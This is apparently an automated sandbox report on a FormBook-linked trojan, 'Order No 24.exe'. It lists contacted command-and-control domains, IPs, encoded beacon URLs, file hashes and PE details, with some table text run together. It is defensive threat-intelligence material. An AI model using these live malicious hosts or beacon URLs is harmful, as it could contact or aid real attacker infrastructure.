                                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://i4.cdn-image.com/__media__/js/min.js?v2.3net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high

                                                                                                                                World Map of Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public IPs

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                47.52.221.8
                                                                                                                                		www.wukong.collegeUnited States
                                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                128.65.195.180
                                                                                                                                		www.evoo.websiteSwitzerland
                                                                                                                                		29222INFOMANIAK-ASCHfalse
                                                                                                                                23.106.59.18
                                                                                                                                		ppp84k45ss7ehy8ypic5x.limelightcdn.comUnited Kingdom
                                                                                                                                		205544LEASEWEB-UK-LON-11GBfalse
                                                                                                                                199.59.243.227
                                                                                                                                		www.migraine-massages.proUnited States
                                                                                                                                		395082BODIS-NJUSfalse
                                                                                                                                217.70.184.50
                                                                                                                                		webredir.vip.gandi.netFrance
                                                                                                                                		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                                                                                208.91.197.27
                                                                                                                                		www.yushaliu.onlineVirgin Islands (BRITISH)
                                                                                                                                		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                209.74.64.58
                                                                                                                                		www.pluribiz.lifeUnited States
                                                                                                                                		31744MULTIBAND-NEWHOPEUSfalse
                                                                                                                                3.33.130.190
                                                                                                                                		fiqsth.vipUnited States
                                                                                                                                		8987AMAZONEXPANSIONGBfalse
                                                                                                                                47.242.89.146
                                                                                                                                		www.kdtzhb.topUnited States
                                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                Analysis ID:1557782
                                                                                                                                Start date and time:2024-11-18 16:24:07 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 10m 43s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:2
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:Order No 24.exe
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@16/9
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 75%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 91%
                                                                                                                                • Number of executed functions: 53
                                                                                                                                • Number of non-executed functions: 291
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                Warnings

                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                • VT rate limit hit for: Order No 24.exe

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                10:25:51API Interceptor10169110x Sleep call for process: net.exe modified

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                47.52.221.8RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.wukong.college/9ezc/
                                                                                                                                128.65.195.180RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.evoo.website/293d/
                                                                                                                                TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.airbnbneuchatel.com/0zfk/
                                                                                                                                Inquiry Second Reminder.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
                                                                                                                                LPOH2401-3172(Mr.Kem Sophea)-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
                                                                                                                                PGiUp8uqGt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
                                                                                                                                LGSTXJeTc4.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                www.yushaliu.onlineRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 208.91.197.27
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 208.91.197.27
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 208.91.197.27
                                                                                                                                webredir.vip.gandi.netRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 217.70.184.50
                                                                                                                                www.evoo.websiteRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                www.wukong.collegeRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8
                                                                                                                                Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                INFOMANIAK-ASCHRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 128.65.195.180
                                                                                                                                https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                                                                • 128.65.195.91
                                                                                                                                https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                                                                • 128.65.195.91
                                                                                                                                z95ordemdecomprapdfx4672xx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 84.16.66.164
                                                                                                                                Doc.exeGet hashmaliciousSliverBrowse
                                                                                                                                • 128.65.199.135
                                                                                                                                Nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 84.16.66.164
                                                                                                                                CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCbotx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 47.241.69.12
                                                                                                                                botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 47.252.147.83
                                                                                                                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                • 47.254.188.7
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.242.89.146
                                                                                                                                yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 47.244.187.149
                                                                                                                                botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                • 8.212.195.111
                                                                                                                                http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                                                                                                • 47.253.61.56
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.242.89.146
                                                                                                                                Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 47.52.221.8
                                                                                                                                inter.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 8.210.59.12
                                                                                                                                LEASEWEB-UK-LON-11GBRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 23.106.59.18
                                                                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 23.106.59.18
                                                                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 23.106.59.18
                                                                                                                                XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                • 23.106.59.18
                                                                                                                                SecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.106.59.52
                                                                                                                                SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 95.168.183.162
                                                                                                                                SecuriteInfo.com.FileRepMalware.15071.2577.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.106.59.18
                                                                                                                                5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.106.59.52
                                                                                                                                F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.106.59.52
                                                                                                                                d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 23.106.59.52

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Temp\F14431U2a

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\net.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.1239949490932863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                Malicious:false
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\autC4A8.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Order No 24.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):288768
                                                                                                                                Entropy (8bit):7.995598763116583
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:6144:N327EjWOBByaRA0h/T5L/YpEQGEyyzGtKS2pUii0n:duFkyaRVh/lLQmEw2pUir
                                                                                                                                MD5:9238A114828F295792588581D25A901B
                                                                                                                                SHA1:3C2515C2BF9F25E074EB5F29F1C0EAB70E8B1769
                                                                                                                                SHA-256:ED753EC8DA9453487910EF64CB9BC60E96CD814809B15491F3BFEEDCD45EBF97
                                                                                                                                SHA-512:9D5A406B013003420C6D5ECB204DDCF3F0380F9A96D101E00E38893713908BB3E87350F365919157F48B945832C87471A3F4CF2B6040D9ADE0730B2EDDE6A1D3
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.....F2HW..[...x.D;..}[N...OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4.XGS=Y.FW.^.s.X..eg,Q9z''7!34Yo;&=])Fh5)w&'Vy9$dw.kj781=hLX>kXGS3F2H.M^.oX>.w$T..*=.O..oT(.]....(0.M...e0-.a-["g72.FAU4OXGSc.2H.MVT[.T.JD3D8JZW.XD@^5DXG.7F2HWLWTR8.DJD3T8JZ'QXFA.4OHGS3D2HQLWTR8YPLD3D8JZWU(BAU6OXGS3F0H..WTB8Y@JD3D(JZGUXFAU4_XGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWT|L<(>D3D..^WUHFAUbKXGC3F2HWLWTR8YPJD.D8*ZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWL

                                                                                                                                C:\Users\user\AppData\Local\Temp\enterogenous

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Order No 24.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):288768
                                                                                                                                Entropy (8bit):7.995598763116583
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:6144:N327EjWOBByaRA0h/T5L/YpEQGEyyzGtKS2pUii0n:duFkyaRVh/lLQmEw2pUir
                                                                                                                                MD5:9238A114828F295792588581D25A901B
                                                                                                                                SHA1:3C2515C2BF9F25E074EB5F29F1C0EAB70E8B1769
                                                                                                                                SHA-256:ED753EC8DA9453487910EF64CB9BC60E96CD814809B15491F3BFEEDCD45EBF97
                                                                                                                                SHA-512:9D5A406B013003420C6D5ECB204DDCF3F0380F9A96D101E00E38893713908BB3E87350F365919157F48B945832C87471A3F4CF2B6040D9ADE0730B2EDDE6A1D3
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.....F2HW..[...x.D;..}[N...OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4.XGS=Y.FW.^.s.X..eg,Q9z''7!34Yo;&=])Fh5)w&'Vy9$dw.kj781=hLX>kXGS3F2H.M^.oX>.w$T..*=.O..oT(.]....(0.M...e0-.a-["g72.FAU4OXGSc.2H.MVT[.T.JD3D8JZW.XD@^5DXG.7F2HWLWTR8.DJD3T8JZ'QXFA.4OHGS3D2HQLWTR8YPLD3D8JZWU(BAU6OXGS3F0H..WTB8Y@JD3D(JZGUXFAU4_XGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWT|L<(>D3D..^WUHFAUbKXGC3F2HWLWTR8YPJD.D8*ZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWLWTR8YPJD3D8JZWUXFAU4OXGS3F2HWL

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.151220800130483
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Order No 24.exe
                                                                                                                                File size:1'218'048 bytes
                                                                                                                                MD5:e785b831c8183b40f176d34c36e8ad3e
                                                                                                                                SHA1:8927f85512b851604e1bb6a44e1e2124b8592381
                                                                                                                                SHA256:dab3c27ad67888d0202abfd11c7fc17d62d501dd611d6f46756bfefe246b06e5
                                                                                                                                SHA512:96c0146d7c8b77dbffaa0416c023978bdd13b257c82a6f21e501c9d58162923d4858d45dfd816b2d000b70899e3904b6bfd39757f1d9f8d0fb2592a9eca41b0c
                                                                                                                                SSDEEP:24576:Ytb20pkaCqT5TBWgNQ7a9PxwVvfaM5jr75mew6A:hVg5tQ7a9PeVvTjX85
                                                                                                                                TLSH:7145CF1363DD8361C7B25273BA65B701AEBF782506B1F96B2FD8093DE920122521E773
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                                                File Icon

                                                                                                                                Icon Hash:aaf3e3e3938382a0

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x425f74
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x673B2208 [Mon Nov 18 11:16:24 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                call 00007FB89D1AB7DFh
                                                                                                                                jmp 00007FB89D19E7F4h
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push edi
                                                                                                                                push esi
                                                                                                                                mov esi, dword ptr [esp+10h]
                                                                                                                                mov ecx, dword ptr [esp+14h]
                                                                                                                                mov edi, dword ptr [esp+0Ch]
                                                                                                                                mov eax, ecx
                                                                                                                                mov edx, ecx
                                                                                                                                add eax, esi
                                                                                                                                cmp edi, esi
                                                                                                                                jbe 00007FB89D19E97Ah
                                                                                                                                cmp edi, eax
                                                                                                                                jc 00007FB89D19ECDEh
                                                                                                                                bt dword ptr [004C0158h], 01h
                                                                                                                                jnc 00007FB89D19E979h
                                                                                                                                rep movsb
                                                                                                                                jmp 00007FB89D19EC8Ch
                                                                                                                                cmp ecx, 00000080h
                                                                                                                                jc 00007FB89D19EB44h
                                                                                                                                mov eax, edi
                                                                                                                                xor eax, esi
                                                                                                                                test eax, 0000000Fh
                                                                                                                                jne 00007FB89D19E980h
                                                                                                                                bt dword ptr [004BA370h], 01h
                                                                                                                                jc 00007FB89D19EE50h
                                                                                                                                bt dword ptr [004C0158h], 00000000h
                                                                                                                                jnc 00007FB89D19EB1Dh
                                                                                                                                test edi, 00000003h
                                                                                                                                jne 00007FB89D19EB2Eh
                                                                                                                                test esi, 00000003h
                                                                                                                                jne 00007FB89D19EB0Dh
                                                                                                                                bt edi, 02h
                                                                                                                                jnc 00007FB89D19E97Fh
                                                                                                                                mov eax, dword ptr [esi]
                                                                                                                                sub ecx, 04h
                                                                                                                                lea esi, dword ptr [esi+04h]
                                                                                                                                mov dword ptr [edi], eax
                                                                                                                                lea edi, dword ptr [edi+04h]
                                                                                                                                bt edi, 03h
                                                                                                                                jnc 00007FB89D19E983h
                                                                                                                                movq xmm1, qword ptr [esi]
                                                                                                                                sub ecx, 08h
                                                                                                                                lea esi, dword ptr [esi+08h]
                                                                                                                                movq qword ptr [edi], xmm1
                                                                                                                                lea edi, dword ptr [edi+08h]
                                                                                                                                test esi, 00000007h
                                                                                                                                je 00007FB89D19E9D5h
                                                                                                                                bt esi, 03h
                                                                                                                                jnc 00007FB89D19EA28h
                                                                                                                                movdqa xmm1, dqword ptr [esi+00h]

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                • [ASM] VS2012 UPD4 build 61030
                                                                                                                                • [RES] VS2012 UPD4 build 61030
                                                                                                                                • [LNK] VS2012 UPD4 build 61030

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x6054c.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x6c4c.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
